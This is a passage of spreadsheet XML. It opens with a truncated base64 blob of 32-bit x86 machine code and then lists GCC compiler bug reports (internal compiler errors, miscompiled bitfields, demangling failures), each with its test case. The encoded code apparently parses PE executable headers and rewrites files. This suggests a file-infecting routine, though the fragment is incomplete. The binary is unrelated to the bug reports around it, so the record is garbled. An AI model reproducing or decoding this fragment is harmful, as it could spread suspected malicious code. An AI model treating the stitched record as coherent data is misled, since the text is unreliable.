 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</t>
  </si>
  <si>
    <t>rafsanjani</t>
  </si>
  <si>
    <t>GCC-45470</t>
  </si>
  <si>
    <t>[4.6 Regression] ICE: verify_flow_info failed: BB 2 can not throw but has an EH edge with -ftree-vectorize -fnon-call-exceptions</t>
  </si>
  <si>
    <t>Compiler output:
$ gcc -O1 -ftree-vectorize -fnon-call-exceptions testcase.C 
testcase.C: In constructor 'B::B()':
testcase.C:17:1: error: BB 2 can not throw but has an EH edge
testcase.C:17:1: internal compiler error: verify_flow_info failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Tested revisions:
r163636 - crash
r162940 - OK</t>
  </si>
  <si>
    <t>GCC-6104</t>
  </si>
  <si>
    <t>ICE when compiling glibc for pentium4</t>
  </si>
  <si>
    <t>Compiling glibc leads to an ICE for stdlib/strtod.c.  The error only occurs when using -march=pentium4.  All lesser options (-march=i686 to -march=pentium3) have no problem.  Using only -O instead of -O2 also avoids the problem.
Release:
gcc 3.2 CVS 2002-3-29
Environment:
x86/Linux
How-To-Repeat:
Compile the attached file with
  gcc32 -O2 -c -march=pentium4 strtod.i</t>
  </si>
  <si>
    <t>GCC-12787</t>
  </si>
  <si>
    <t>[3.4 Regression] [unit-at-a-time] libsupc++/tinfo2.cc:167: internal compiler error: in output_die at dwarf2out.c:6652</t>
  </si>
  <si>
    <t>toolchain:~/obj34/obj-gcc/powerpc-unknown-linux-gnu/nof/libstdc++-v3/libsupc++ $ /home/toolchain/obj34/obj-gcc/gcc/cc1plus -fpreprocessed tinfo2.ii -quiet -dumpbase tinfo2.cc -msoft-float -mstrict-align -msoft-float -mstrict-align -auxbase-strip tinfo2.o -g -g -O2 -O1 -O1 -Wall -Wall -Wall -W -Wwrite-strings -Wcast-qual -version -fPIC -fsigned-char -fmessage-length=0 -fsigned-char -fmessage-length=0 -fPIC -fno-implicit-templates -fdiagnostics-show-location=once -fPIC -o tinfo2.s
GNU C++ version 3.4 20031027 (experimental) (powerpc-unknown-linux-gnu)
        compiled by GNU C version 3.2.3 20030422 (Gentoo Linux 1.4 3.2.3-r1 propolice).
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
/home/toolchain/src/gcc-head/libstdc++-v3/libsupc++/tinfo2.cc:167: internal compiler error: in output_die at dwarf2out.c:6652
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-78761</t>
  </si>
  <si>
    <t>C++14 compiler generate mangled name that can not be demangled</t>
  </si>
  <si>
    <t>cat t.cc
template 
decltype(auto) g_1(T t) {
    return t
}
template 
auto g_2(T t) {
    return t
}
int main() {
    decltype(auto) res = g_1(10)
    decltype(auto) res2 = g_2(10)
    return 0
}
==========================================
g++ -g t.cc
&gt; nm a.out | grep g_2
[71]    |     4198535|   12|FUNC |WEAK |0    |20     |_Z3g_2IiEDaT_
&gt; /pkg/gnu/bin/gnu-c++filt _Z3g_2IiEDaT_
auto g_2(int) &lt;=== this is OK
&gt; nm a.out | grep g_1
[84]    |      4198523|   12|FUNC |WEAK |0    |19     |_Z3g_1IiEDcT_
&gt; /pkg/gnu/bin/gnu-c++filt _Z3g_1IiEDcT_
_Z3g_1IiEDcT_   &lt;=== can not be demangled</t>
  </si>
  <si>
    <t>chihin.ko</t>
  </si>
  <si>
    <t>GCC-544</t>
  </si>
  <si>
    <t>current GCC failed with invalid lvalue in assignment</t>
  </si>
  <si>
    <t>The attached file (destilled from glibc) fails with current
gcc:
$ /opt/gcc-2.96.test/bin/gcc rcmd2.i -c -O3  -o /builds/glibc/20000725-gcc-2.96.test/inet/rcmd.o
rcmd2.i: In function `rcmd_af':
rcmd2.i:28: invalid lvalue in assignment
Release:
2.96 20000917 (from CVS)
Environment:
Linux 2.4.0 test9-pre2 glibc 2.1.3
How-To-Repeat:
Compile the file with optimization on an ix86 target.</t>
  </si>
  <si>
    <t>GCC-2218</t>
  </si>
  <si>
    <t>Problem with pointers on class-member functions</t>
  </si>
  <si>
    <t>When attempting to compile the program below (see How-To-Repeat) GCC produce the following output :
---------------- Start ----------------
Reading specs from /usr/lib/gcc-lib/i686-pc-linux/2.95.2/specs
gcc version 2.95.2 19991024 (release)
 /usr/lib/gcc-lib/i686-pc-linux/2.95.2/cpp -lang-c++ -v -D__GNUC__=2 -D__GNUG__=2 -D__GNUC_MINOR__=95 -D__cplusplus -D__ELF__ -Dunix -D__i386__ -Dlinux -D__ELF__ -D__unix__ -D__i386__ -D__linux__ -D__unix -D__linux -Asystem(posix) -D__EXCEPTIONS -Acpu(i386) -Amachine(i386) -Di386 -D__i386 -D__i386__ -Di686 -Dpentiumpro -D__i686 -D__i686__ -D__pentiumpro -D__pentiumpro__ test.cc test.ii
GNU CPP version 2.95.2 19991024 (release) (i386 Linux/ELF)
#include ... search starts here:
#include  search starts here:
 /usr/lib/gcc-lib/i686-pc-linux/2.95.2/../../../../include/g++-3
 /usr/include
 /usr/lib/gcc-lib/i686-pc-linux/2.95.2/../../../../i686-pc-linux/include
 /usr/lib/gcc-lib/i686-pc-linux/2.95.2/include
 /usr/include
End of search list.
The following default directories have been omitted from the search path:
End of omitted list.
 /usr/lib/gcc-lib/i686-pc-linux/2.95.2/cc1plus test.ii -quiet -dumpbase test.cc -version -o test.s
GNU C++ version 2.95.2 19991024 (release) (i686-pc-linux) compiled by GNU C version 2.95.2 19991024 (release).
test.cc: In method `void Test::helloFunc()':
test.cc:6: no matching function for call to `Test::executeFunction ({unknown type})'
test.cc:8: candidates are: void Test::executeFunction(void (*)())
-------------- End --------------
Note that function pointer helloFunc should have been of type void (*)() and is not recognized as this by the compiler.
Moreover the gcc under development also rejects this code.
Release:
gcc version 2.95.2 19991024 (release)
Environment:
i686-pc-linux Mandrake 7.1 2.4.2 kernel
How-To-Repeat:
Try this program...
#include 
class Test {
public:
  void helloFunc() {
    executeFunction(hello)
  }
  void executeFunction( void (*fnt) () ) {
    (*fnt)()
  }
private:
  void hello()
}
void helloagain() {
  std::cout &lt;&lt; Hello again!! &lt;&lt; std::endl
}
void Test::hello(){
  std::cout &lt;&lt; Hello!! &lt;&lt; std::endl
}
int main() {
  Test test
  test.helloFunc()
  test.executeFunction( helloagain )
  return 0
}</t>
  </si>
  <si>
    <t>stephane.brunet</t>
  </si>
  <si>
    <t>GCC-1753</t>
  </si>
  <si>
    <t>g++ 2.95.2 generates incorrect code when __attribute__((packed)) is combined with bitfields</t>
  </si>
  <si>
    <t>If g++ encounters bitfields in a structure followed by
members which are __attribute__((packed)) and the bitfields
do not make up a full byte/word/dword the packed member
ends up occupying the same place in memory as the bitfields.
This only occurs when compiling with g++: if gcc is used on
the same input the generated output is correct.
In the given example the correct output should be 0.  
Using g++ it is 1.  This occurs whether or not member a
of the structure has __attribute__((packed)) following it
but only occurs if member x has __attribute__((packed)) 
following it.
Release:
g++ 2.95.2
Environment:
Linux RedHat 6.2
How-To-Repeat:
The code is:
#include 
typedef struct {
  unsigned char a : 1
  unsigned char x __attribute__((packed))
} test
int main () {
  test t = {0 0}
  t.a = 1
  printf (%x\n t.x)
}
If written to test.c do:
g++ test.c
and run a.out.</t>
  </si>
  <si>
    <t>cruden</t>
  </si>
  <si>
    <t>GCC-55558</t>
  </si>
  <si>
    <t>[C++11] decltype on a static member variable in a template function results in an internal compiler error</t>
  </si>
  <si>
    <t>The following piece of code:
template class A
{
}
class B
{
}
template class A
{
public:
	static int member
}
template void foobar ()
{
	typedef decltype (A::member) myType
}
produces the following error:
test.cpp: In function 'void foobar()':
test.cpp:17:32: internal compiler error: in finish_decltype_type at cp/semantics.c:5274
I accidently used the actual class B instead of the template parameter T in the foobar function and stumbled upon this error. The error is NOT reproducible when at least ONE of the following points applies:
- the member variable 'member' is not static
- 'foobar' is not a template method
- the expression inside the decltype statement is inside another expression e.g. a function call or as an operand to an operator
The typedef expression is not relevant for the error it also happens when the decltype expression is used to declare a variable or as a template parameter.</t>
  </si>
  <si>
    <t>GCC-78342</t>
  </si>
  <si>
    <t>ICE in rtl_verify_bb_insns at cfgrtl.c:2657 (error: flow control insn inside a basic block)</t>
  </si>
  <si>
    <t>gcc-7.0.0-alpha20161113 snapshot ICEs when compiling the following reduced snippet for 32-bit BE powerpc w/ -O2 (or -O3) -fPIC:
unsigned int cn pb
void
zc (void)
{
  char *ir
  char r2 = 1
  unsigned long long int ws = ((pb != 0) ? cn : 2ull)
  if (ws &gt;= 2u)
    {
      ir = (char *)
      for (pb = 0 pb &lt; 2 ++pb)
        {
          ws = 0ull
          while (*ir &lt; 1)
            (*ir)++
        }
    }
  else
    ir = 
  if (ws == 0ull || *ir != r2)
    cn = 0
  cn %= 0
}
% powerpc-e300c3-linux-gnu-gcc-7.0.0-alpha20161113 -fPIC -O2 -w -c uq0ggewy.c
uq0ggewy.c: In function 'zc':
uq0ggewy.c:26:1: error: in basic block 7:
 }
 ^
uq0ggewy.c:26:1: error: flow control insn inside a basic block
(insn 109 58 146 7 (trap_if (const_int 1 [0x1])
        (const_int 0 [0])) 820 {trap}
     (nil))
uq0ggewy.c:26:1: internal compiler error: in rtl_verify_bb_insns at cfgrtl.c:2657
0x320be071ca5 _fatal_insn(char const* rtx_def const* char const* int char const*)
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-7.0.0_alpha20161113/work/gcc-7-20161113/gcc/rtl-error.c:108
0x320bdc3d037 rtl_verify_bb_insns
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-7.0.0_alpha20161113/work/gcc-7-20161113/gcc/cfgrtl.c:2657
0x320bdc3d037 rtl_verify_flow_info_1
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-7.0.0_alpha20161113/work/gcc-7-20161113/gcc/cfgrtl.c:2743
0x320bdc3d0a4 rtl_verify_flow_info
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-7.0.0_alpha20161113/work/gcc-7-20161113/gcc/cfgrtl.c:2985
0x320bdc291dd verify_flow_info()
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-7.0.0_alpha20161113/work/gcc-7-20161113/gcc/cfghooks.c:258
0x320be725921 execute
	/var/tmp/portage/cross-powerpc-e300c3-linux-gnu/gcc-7.0.0_alpha20161113/work/gcc-7-20161113/gcc/bb-reorder.c:2577</t>
  </si>
  <si>
    <t>GCC-50191</t>
  </si>
  <si>
    <t>Strange debug insn produced for TOC compiling 416.gamess with profile-generate</t>
  </si>
  <si>
    <t>Created attachment 25107
Failing source code
I opened a bug against binutils (http://sourceware.org/bugzilla/show_bug.cgi?id=13131) for the linkage error described there.  However Alan Modra determined the linker was confused by a strange debug_insn reference into the TOC produced by gcc:
(debug_insn 8390 8396 8395 5 (var_location:DI D#142 (mem/u/c:DI (lo_sum:DI (reg/f:DI 2011)
            (const:DI (unspec:DI [
                        (symbol_ref/u:DI (*.LC7) [flags 0x2])
                    ] UNSPEC_TOCREL))) [23 S8 A8])) -1
     (nil))
The debug_insn appears to be modified during combine prior to that it contains the more innocuous:
